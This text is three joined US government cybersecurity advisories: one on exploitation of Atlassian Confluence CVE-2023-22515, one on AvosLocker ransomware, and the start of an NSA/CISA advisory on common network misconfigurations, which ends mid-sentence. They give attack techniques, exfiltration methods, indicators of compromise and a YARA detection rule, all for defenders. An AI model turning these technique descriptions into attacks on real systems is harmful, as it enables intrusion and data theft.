Atlassian’s advisory provides interim measures to temporarily mitigate known attack vectors, CISA, FBI, and MS-ISAC strongly encourage upgrading to a fixed version or taking servers offline to apply necessary updates. Download the PDF version of this report: AA23-289A Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks (PDF, 476.56 KB ) For a downloadable copy of IOCs, see: AA23-289A STIX XML (XML, 12.45 KB ) AA23-289A STIX JSON (JSON, 9.03 KB ) TECHNICAL DETAILS Overview CVE-2023-22515 is a critical Broken Access Control vulnerability affecting the following versions of Atlassian Confluence Data Center and Server. Note: Atlassian Cloud sites (sites accessed by an atlassian.net domain), including Confluence Data Center and Server versions before 8.0.0, are not affected by this vulnerability. 8.0.0 8.0.1 8.0.2 8.0.3 8.0.4 8.1.0 8.1.1 8.1.3 8.1.4 8.2.0 8.2.1 8.2.2 8.2.3 8.3.0 8.3.1 8.3.2 8.4.0 8.4.1 8.4.2 8.5.0 8.5.1 Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. More specifically, threat actors can change the Confluence server’s configuration to indicate the setup is not complete and use the /setup/setupadministrator.action endpoint to create a new administrator user. The vulnerability is triggered via a request on the unauthenticated /server-info.action endpoint. Considering the root cause of the vulnerability allows threat actors to modify critical configuration settings, CISA, FBI, and MS-ISAC assess that the threat actors may not be limited to creating new administrator accounts. Open source further indicates an Open Web Application Security Project (OWASP) classification of injection (i.e., CWE-20: Improper Input Validation) is an appropriate description.[2] Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day—a previously unidentified vulnerability.[1] On October 5, 2023, CISA added this vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation. Due to the ease of exploitation, CISA, FBI, and MS-ISAC expect to see widespread exploitation of unpatched Confluence instances in government and private networks. Post-Exploitation: Exfiltration of Data Post-exploitation exfiltration of data can be executed through of a variety of techniques. A predominant method observed involves the use of cURL—a command line tool used to transfer data to or from a server. An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. Note: This does not preclude the effectiveness of alternate methods, but highlights methods observed to date. Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line. Example configuration file templates are listed in the following Figures 1 and 2, which are populated with the credentials of the exfiltration point: [s3] type = env_auth = access_key_id = secret_access_key = region =  endpoint =   location_constraint = acl = server_side_encryption = storage_class = [minio] type = provider = env_auth = access_key_id = secret_access_key = endpoint = acl = The following User-Agent strings were observed in request headers. Note: As additional threat actors begin to use this CVE due to the availability of publicly posted proof-of-concept code, an increasing variation in User-Agent strings is expected: Python-requests/2.27.1 curl/7.88.1 Indicators of Compromise Disclaimer: Organizations are recommended to investigate or vet these IP addresses prior to taking action, such as blocking. The following IP addresses were obtained from FBI investigations as of October 2023 and observed conducting data exfiltration: 170.106.106[.]16 43.130.1[.]222 152.32.207[.]23 199.19.110[.]14 95.217.6[.]16 (Note: This is the official rclone.org website) Additional IP addresses observed sending related exploit traffic have been shared by Microsoft.[3] DETECTION METHODS Network defenders are encouraged to review and deploy Proofpoint’s Emerging Threat signatures. See Ruleset Update Summary - 2023/10/12 - v10438.[4] Network defenders are also encouraged to aggregate application and server-level logging from Confluence servers to a logically separated log search and alerting system, as well as configure alerts for signs of exploitation (as detailed in Atlassian’s security advisory). INCIDENT RESPONSE Organizations are encouraged to review all affected Confluence instances for evidence of compromise, as outlined by Atlassian.[1] If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform any number of unfettered actions—these include but are not limited to exfiltration of content and system credentials, as well as installation of malicious plugins. If a potential compromise is detected, organizations should: Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections. Note: Upgrading to fixed versions, as well as removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms. Search and audit logs from Confluence servers for attempted exploitation.[2] Quarantine and take offline potentially affected hosts. Provision new account credentials. Reimage compromised hosts. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov. State, local, tribal, and territorial governments should report incidents to the MS-ISAC (SOC@cisecurity.org or 866-787-4722). MITIGATIONS These mitigations apply to all organizations using non-cloud Atlassian Confluence Data Center and Server software. CISA, FBI, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices to reduce the prevalence of Broken Access Control vulnerabilities, thus strengthening the secure posture for their customers. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide. As of October 10, 2023, proof-of-concept exploits for CVE-2023-22515 have been observed in open source publications.[5] While there are immediate concerns such as increased risk of exploitation and the potential integration into malware toolkits, the availability of a proof-of-concept presents an array of security and operational challenges that extend beyond these immediate issues. Immediate action is strongly advised to address the potential risks associated with this development. CISA, FBI, and MS-ISAC recommend taking immediate action to address the potential associated risks and encourage organizations to: Immediately upgrade to fixed versions. See Atlassian’s upgrading instructions[6] for more information. If unable to immediately apply upgrades, restrict untrusted network access until feasible. Malicious cyber threat actors who exploit the affected instance can escalate to administrative privileges. Follow best cybersecurity practices in your production and enterprise environments. While not observed in this instance of exploitation, mandating phishing-resistant multifactor authentication (MFA) for all staff and services can make it more difficult for threat actors to gain access to networks and information systems. For additional best practices, see: CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures (TTPs). Because the CPGs are a subset of best practices, CISA recommends software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF). Center for Internet Security’s (CIS) Critical Security Controls. The CIS Critical Security Controls are a prescriptive, prioritized, and simplified set of best practices that organizations can use to strengthen cybersecurity posture and protect against cyber incidents. RESOURCES NIST: CVE-2023-22515 MITRE: CWE-20 - Improper Input Validation CISA: Known Exploited Vulnerabilities Catalog MITRE Software: Rclone CISA: Secure by Design and Default CISA: Phishing-Resistant MFA CISA: Cross-Sector Cybersecurity Performance Goals CIS: Critical Security Controls REFERENCES [1]   Atlassian: CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server [2]   Rapid7: CVE-2023-22515 Analysis [3]   Microsoft: CVE-2023-22515 Exploit IP Addresses [4]   Proofpoint: Emerging Threats Rulesets [5]   Confluence CVE-2023-22515 Proof of Concept - vulhub [6]   Atlassian Support: Upgrading Confluence DISCLAIMER The information in this report is being provided “as is” for informational purposes only. CISA, FBI, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, FBI, and MS-ISAC. VERSION HISTORY October 16, 2023: Initial version.

SUMMARY Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known IOCs, TTPs, and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023. AvosLocker operates under a ransomware-as-a-service (RaaS) model. AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data. This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, Indicators of Compromise Associated with AvosLocker ransomware, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). This update includes IOCs and TTPs not included in the previous advisory and a YARA rule FBI developed after analyzing a tool associated with an AvosLocker compromise. FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of AvosLocker ransomware and other ransomware incidents. Download the PDF version of this report: AA23-284A #StopRansomware: AvosLocker Ransomware (Update) (PDF, 528.00 KB ) For a downloadable copy of IOCs, see: AA23-284A STIX XML (XML, 46.67 KB ) AA23-284A STIX JSON (JSON, 34.50 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. AvosLocker affiliates use legitimate software and open-source tools during ransomware operations, which include exfiltration-based data extortion. Specifically, affiliates use: Remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—as backdoor access vectors [T1133]. Scripts to execute legitimate native Windows tools [T1047], such as PsExec and Nltest. Open-source networking tunneling tools [T1572] Ligolo[1] and Chisel[2]. Cobalt Strike and Sliver[3] for command and control (C2). Lazagne and Mimikatz for harvesting credentials [T1555]. FileZilla and Rclone for data exfiltration. Notepad++, RDP Scanner, and 7zip. FBI has also observed AvosLocker affiliates: Use custom PowerShell [T1059.001] and batch (.bat) scripts [T1059.003] for lateral movement, privilege escalation, and disabling antivirus software. Upload and use custom webshells to enable network access [T1505.003]. For additional TTPs, see joint CSA Indicators of Compromise Associated with AvosLocker Ransomware. Indicators of Compromise (IOCs) See Tables 1 and 2 below for IOCs obtained from January 2023–May 2023. Table 1: Files, Tools, and Hashes as of May 2023 Files and Tools MD5 psscriptpolicytest_im2hdxqi.g0k.ps1 829f2233a1cd77e9ec7de98596cd8165 psscriptpolicytest_lysyd03n.o10.ps1 6ebd7d7473f0ace3f52c483389cab93f psscriptpolicytest_1bokrh3l.2nw.ps1 10ef090d2f4c8001faadb0a833d60089 psscriptpolicytest_nvuxllhd.fs4.ps1 8227af68552198a2d42de51cded2ce60 psscriptpolicytest_2by2p21u.4ej.ps1 9d0b3796d1d174080cdfdbd4064bea3a psscriptpolicytest_te5sbsfv.new.ps1 af31b5a572b3208f81dbf42f6c143f99 psscriptpolicytest_v3etgbxw.bmm.ps1 1892bd45671f17e9f7f63d3ed15e348e psscriptpolicytest_fqa24ixq.dtc.ps1 cc68eaf36cb90c08308ad0ca3abc17c1 psscriptpolicytest_jzjombgn.sol.ps1 646dc0b7335cffb671ae3dfd1ebefe47 psscriptpolicytest_rdm5qyy1.phg.ps1 609a925fd253e82c80262bad31637f19 psscriptpolicytest_endvm2zz.qlp.ps1 c6a667619fff6cf44f447868d8edd681 psscriptpolicytest_s1mgcgdk.25n.ps1 3222c60b10e5a7c3158fd1cb3f513640 psscriptpolicytest_xnjvzu5o.fta.ps1 90ce10d9aca909a8d2524bc265ef2fa4 psscriptpolicytest_satzbifj.oli.ps1 44a3561fb9e877a2841de36a3698abc0 psscriptpolicytest_grjck50v.nyg.ps1 5cb3f10db11e1795c49ec6273c52b5f1 psscriptpolicytest_0bybivfe.x1t.ps1 122ea6581a36f14ab5ab65475370107e psscriptpolicytest_bzoicrns.kat.ps1 c82d7be7afdc9f3a0e474f019fb7b0f7 Files and Tools SHA256 BEACON.PS1 e68f9c3314beee640cc32f08a8532aa8dcda613543c54a83680c21d7cd49ca0f Encoded PowerShell script ad5fd10aa2dc82731f3885553763dfd4548651ef3e28c69f77ad035166d63db7   Encoded PowerShell script 48dd7d519dbb67b7a2bb2747729fc46e5832c30cafe15f76c1dbe3a249e5e731   Files and Tools SHA1 PowerShell backdoor 2d1ce0231cf8ff967c36bbfc931f3807ddba765c Table 2: Email Address and Virtual Currency Wallets Email Address keishagrey994@outlook[.]com Virtual Currency Wallets a6dedd35ad745641c52d6a9f8da1fb09101d152f01b4b0e85a64d21c2a0845ee bfacebcafff00b94ad2bff96b718a416c353a4ae223aa47d4202cdbc31e09c92 418748c1862627cf91e829c64df9440d19f67f8a7628471d4b3a6cc5696944dd bc1qn0u8un00nl6uz6uqrw7p50rg86gjrx492jkwfn DETECTION Based on an investigation by an advanced digital forensics group, FBI created the following YARA rule to detect the signature for a file identified as enabling malware. NetMonitor.exe is a malware masquerading as a legitimate process and has the appearance of a legitimate network monitoring tool. This persistence tool sends pings from the network every five minutes. The NetMonitor executable is configured to use an IP address as its command server, and the program communicates with the server over port 443. During the attack, traffic between NetMonitor and the command server is encrypted, where NetMonitor functions like a reverse proxy and allows actors to connect to the tool from outside the victim’s network. YARA Rule rule NetMonitor  {   meta:     author = "FBI"     source = "FBI"     sharing = "TLP:CLEAR"     status = "RELEASED"     description = "Yara rule to detect NetMonitor.exe"     category = "MALWARE"     creation_date = "2023-05-05"   strings:     $rc4key = {11 4b 8c dd 65 74 22 c3}     $op0 = {c6 [3] 00 00 05 c6 [3] 00 00 07 83 [3] 00 00 05 0f 85 [4] 83 [3] 00 00 01 75 ?? 8b [2] 4c 8d [2] 4c 8d [3] 00 00 48 8d [3] 00 00 48 8d [3] 00 00 48 89 [3] 48 89 ?? e8}   condition:     uint16(0) == 0x5A4D     and filesize < 50000     and any of them } MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 3-7 for all referenced threat actor tactics and techniques in this advisory. Table 3: AvosLocker Affiliates ATT&CK Techniques for Initial Access Initial Access     Technique Title ID Use External Remote Services T1133 AvosLocker affiliates use remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—to access backdoor access vectors. Table 4: AvosLocker Affiliates ATT&CK Techniques for Execution Execution     Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 AvosLocker affiliates use custom PowerShell scripts to enable privilege escalation, lateral movement, and to disable antivirus. Command and Scripting Interpreter: Windows Command Shell T1059.003 AvosLocker affiliates use custom .bat scripts to enable privilege escalation, lateral movement, and to disable antivirus.  Windows Management Instrumentation T1047 AvosLocker affiliates use legitimate Windows tools, such as PsExec and Nltest in their execution. Table 5: AvosLocker Affiliates ATT&CK Techniques for Persistence Persistence     Technique Title ID Use Server Software Component T1505.003 AvosLocker affiliates have uploaded and used custom webshells to enable network access. Table 6: AvosLocker Affiliates ATT&CK Techniques for Credential Access Credential Access     Technique Title ID Use Credentials from Password Stores T1555 AvosLocker affiliates use open-source applications Lazagne and Mimikatz to steal credentials from system stores. Table 7: AvosLocker Affiliates ATT&CK Techniques for Command and Control Command and Control     Technique Title ID Use Protocol Tunneling T1572 AvosLocker affiliates use open source networking tunneling tools like Ligolo and Chisel. MITIGATIONS These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the secure posture for their customers. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide. FBI and CISA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise by AvosLocker ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Secure remote access tools by: Implementing application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Applying recommendations in CISA's joint Guide to Securing Remote Access Software. Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP. Close unused RDP ports. Enforce account lockouts after a specified number of attempts. Apply phishing-resistant multifactor authentication (MFA). Log RDP login attempts. Disable command-line and scripting activities and permissions [CPG 2.N]. Restrict the use of PowerShell, using Group Policy, and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E]. Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T]. Enable enhanced PowerShell logging [CPG 2.T, 2.U]. PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use. Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging). The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible. Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec. In addition, FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors: Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud). Maintain offline backups of data, and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization minimizes the impact of disruption to business practices as they will not be as severe and/or only have irretrievable data [CPG 2.R]. Recommend organizations follow the 3-2-1 backup strategy in which organizations have three copies of data (one copy of production data and two backup copies) on two different media such as disk and tape, with one copy kept off-site for disaster recovery. Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies. Use longer passwords consisting of at least 15 characters [CPG 2.B]. Store passwords in hashed format using industry-recognized password managers. Add password user “salts” to shared login credentials. Avoid reusing passwords [CPG 2.C]. Implement multiple failed login attempt account lockouts [CPG 2.G]. Disable password “hints.” Refrain from requiring password changes more frequently than once per year.Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher. Require administrator credentials to install software. Require phishing-resistant multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H]. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks, restricting further lateral movement [CPG 2.F]. Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections, as they have insight into common and uncommon network connections for each host [CPG 3.A]. Install, regularly update, and enable real time detection for antivirus software on all hosts. Disable unused ports [CPG 2.V]. Consider adding an email banner to emails received from outside your organization [CPG 2.M]. Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R]. VALIDATE SECURITY CONTROLS In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 3-7). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts. The Joint Ransomware Guide provides preparation, prevention, and mitigation best practices as well as a ransomware response checklist. Cyber Hygiene Services and Ransomware Readiness Assessment provide no-cost cyber hygiene and ransomware readiness assessment services. REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with AvosLocker affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870. DISCLAIMER The information in this report is being provided “as is” for informational purposes only. CISA and  FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI. REFERENCES [1] GitHub sysdream | ligolo repository [2] GitHub jpillora | chisel repository [3] GitHub BishopFox | sliver repository

A plea for network defenders and software manufacturers to fix common problems. EXECUTIVE SUMMARY The National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint cybersecurity advisory (CSA) to highlight the most common cybersecurity misconfigurations in large organizations, and detail the tactics, techniques, and procedures (TTPs) actors use to exploit these misconfigurations. Through NSA and CISA Red and Blue team assessments, as well as through the activities of NSA and CISA Hunt and Incident Response teams, the agencies identified the following 10 most common network misconfigurations: Default configurations of software and applications Improper separation of user/administrator privilege Insufficient internal network monitoring Lack of network segmentation Poor patch management Bypass of system access controls Weak or misconfigured multifactor authentication (MFA) methods Insufficient access control lists (ACLs) on network shares and services Poor credential hygiene Unrestricted code execution These misconfigurations illustrate (1) a trend of systemic weaknesses in many large organizations, including those with mature cyber postures, and (2) the importance of software manufacturers embracing secure-by-design principles to reduce the burden on network defenders: Properly trained, staffed, and funded network security teams can implement the known mitigations for these weaknesses. Software manufacturers must reduce the prevalence of these misconfigurations—thus strengthening the security posture for customers—by incorporating secure-by-design and -default principles and tactics into their software development practices.[1] NSA and CISA encourage network defenders to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of malicious actors exploiting the identified misconfigurations. Remove default credentials and harden configurations. Disable unused services and implement access controls. Update regularly and automate patching, prioritizing patching of known exploited vulnerabilities.[2] Reduce, restrict, audit, and monitor administrative accounts and privileges. NSA and CISA urge software manufacturers to take ownership of improving security outcomes of their customers by embracing secure-by-design and-default tactics, including: Embedding security controls into product architecture from the start of development and throughout the entire software development lifecycle (SDLC). Eliminating default passwords. Providing high-quality audit logs to customers at no extra charge. Mandating MFA, ideally phishing-resistant, for privileged users and making MFA a default rather than opt-in feature.[3] Download the PDF version of this report: PDF, 660 KB TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13, and the MITRE D3FEND™ cybersecurity countermeasures framework.[4],[5] See the Appendix: MITRE ATT&CK tactics and techniques section for tables summarizing the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques, and the Mitigations section for MITRE D3FEND countermeasures. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.[6],[7] Overview Over the years, the following NSA and CISA teams have assessed the security posture of many network enclaves across the Department of Defense (DoD); Federal Civilian Executive Branch (FCEB); state, local, tribal, and territorial (SLTT) governments; and the private sector: Depending on the needs of the assessment, NSA Defensive Network Operations (DNO) teams feature capabilities from Red Team (adversary emulation), Blue Team (strategic vulnerability assessment), Hunt (targeted hunt), and/or Tailored Mitigations (defensive countermeasure development). CISA Vulnerability Management (VM) teams have assessed the security posture of over 1,000 network enclaves. CISA VM teams include Risk and Vulnerability Assessment (RVA) and CISA Red Team Assessments (RTA).[8] The RVA team conducts remote and onsite assessment services, including penetration testing and configuration review. RTA emulates cyber threat actors in coordination with an organization to assess the organization’s cyber detection and response capabilities. CISA Hunt and Incident Response teams conduct proactive and reactive engagements, respectively, on organization networks to identify and detect cyber threats to U.S. infrastructure. During these assessments, NSA and CISA identified the 10 most common network misconfigurations, which are detailed below. These misconfigurations (non-prioritized) are systemic weaknesses across many networks. Many of the assessments were of Microsoft® Windows® and Active Directory® environments. This advisory provides details about, and mitigations for, specific issues found during these assessments, and so mostly focuses on these products. However, it should be noted that many other environments contain similar misconfigurations. Network owners and operators should examine their networks for similar misconfigurations even when running other software not specifically mentioned below. 1. Default Configurations of Software and Applications Default configurations of systems, services, and applications can permit unauthorized access or other malicious activity. Common default configurations include: Default credentials Default service permissions and configurations settings Default Credentials Many software manufacturers release commercial off-the-shelf (COTS) network devices —which provide user access via applications or web portals—containing predefined default credentials for their built-in administrative accounts.[9] Malicious actors and assessment teams regularly abuse default credentials by: Finding credentials with a simple web search [T1589.001] and using them [T1078.001] to gain authenticated access to a device. Resetting built-in administrative accounts [T1098] via predictable forgotten passwords questions. Leveraging default virtual private network (VPN) credentials for internal network access [T1133]. Leveraging publicly available setup information to identify built-in administrative credentials for web applications and gaining access to the application and its underlying database. Leveraging default credentials on software deployment tools [T1072] for code execution and lateral movement. In addition to devices that provide network access, printers, scanners, security cameras, conference room audiovisual (AV) equipment, voice over internet protocol (VoIP) phones, and internet of things (IoT) devices commonly contain default credentials that can be used for easy unauthorized access to these devices as well. Further compounding this problem, printers and scanners may have privileged domain accounts loaded so that users can easily scan documents and upload them to a shared drive or email them. Malicious actors who gain access to a printer or scanner using default credentials can use the loaded privileged domain accounts to move laterally from the device and compromise the domain [T1078.002]. Default Service Permissions and Configuration Settings Certain services may have overly permissive access controls or vulnerable configurations by default. Additionally, even if the providers do not enable these services by default, malicious actors can easily abuse these services if users or administrators enable them. Assessment teams regularly find the following: Insecure Active Directory Certificate Services Insecure legacy protocols/services Insecure Server Message Block (SMB) service Insecure Active Directory Certificate Services Active Directory Certificate Services (ADCS) is a feature used to manage Public Key Infrastructure (PKI) certificates, keys, and encryption inside of Active Directory (AD) environments. ADCS templates are used to build certificates for different types of servers and other entities on an organization’s network. Malicious actors can exploit ADCS and/or ADCS template misconfigurations to manipulate the certificate infrastructure into issuing fraudulent certificates and/or escalate user privileges to domain administrator privileges. These certificates and domain escalation paths may grant actors unauthorized, persistent access to systems and critical data, the ability to impersonate legitimate entities, and the ability to bypass security measures. Assessment teams have observed organizations with the following misconfigurations: ADCS servers running with web-enrollment enabled. If web-enrollment is enabled, unauthenticated actors can coerce a server to authenticate to an actor-controlled computer, which can relay the authentication to the ADCS web-enrollment service and obtain a certificate [T1649] for the server’s account. These fraudulent, trusted certificates enable actors to use adversary-in-the-middle techniques [T1557] to masquerade as trusted entities on the network. The actors can also use the certificate for AD authentication to obtain a Kerberos Ticket Granting Ticket (TGT) [T1558.001], which they can use to compromise the server and usually the entire domain. ADCS templates where low-privileged users have enrollment rights, and the enrollee supplies a subject alternative name. Misconfiguring various elements of ADCS templates can result in domain escalation by unauthorized users (e.g., granting low-privileged users certificate enrollment rights, allowing requesters to specify a subjectAltName in the certificate signing request [CSR], not requiring authorized signatures for CSRs, granting FullControl or WriteDacl permissions to users). Malicious actors can use a low-privileged user account to request a certificate with a particular Subject Alternative Name (SAN) and gain a certificate where the SAN matches the User Principal Name (UPN) of a privileged account. Note: For more information on known escalation paths, including PetitPotam NTLM relay techniques, see: Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints and Certified Pre-Owned, Active Directory Certificate Services.[10],[11],[12] Insecure legacy protocols/services Many vulnerable network services are enabled by default, and assessment teams have observed them enabled in production environments. Specifically, assessment teams have observed Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS), which are Microsoft Windows components that serve as alternate methods of host identification. If these services are enabled in a network, actors can use spoofing, poisoning, and relay techniques [T1557.001] to obtain domain hashes, system access, and potential administrative system sessions. Malicious actors frequently exploit these protocols to compromise entire Windows’ environments. Malicious actors can spoof an authoritative source for name resolution on a target network by responding to passing traffic, effectively poisoning the service so that target computers will communicate with an actor-controlled system instead of the intended one. If the requested system requires identification/authentication, the target computer will send the user’s username and hash to the actor-controlled system. The actors then collect the hash and crack it offline to obtain the plain text password [T1110.002]. Insecure Server Message Block (SMB) service The Server Message Block service is a Windows component primarily for file sharing. Its default configuration, including in the latest version of Windows, does not require signing network messages to ensure authenticity and integrity. If SMB servers do not enforce SMB signing, malicious actors can use machine-in-the-middle techniques, such as NTLM relay. Further, malicious actors can combine a lack of SMB signing with the name resolution poisoning issue (see above) to gain access to remote systems [T1021.002] without needing to capture and crack any hashes. 2. Improper Separation of User/Administrator Privilege Administrators often assign multiple roles to one account. These accounts have access to a wide range of devices and services, allowing malicious actors to move through a network quickly with one compromised account without triggering lateral movement and/or privilege escalation detection measures. Assessment teams have observed the following common account separation misconfigurations: Excessive account privileges Elevated service account permissions Non-essential use of elevated accounts Excessive Account Privileges Account privileges are intended to control user access to host or application resources to limit access to sensitive information or enforce a least-privilege security model. When account privileges are overly permissive, users can see and/or do things they should not be able to, which becomes a security issue as it increases risk exposure and attack surface. Expanding organizations can undergo numerous changes in account management, personnel, and access requirements. These changes commonly lead to 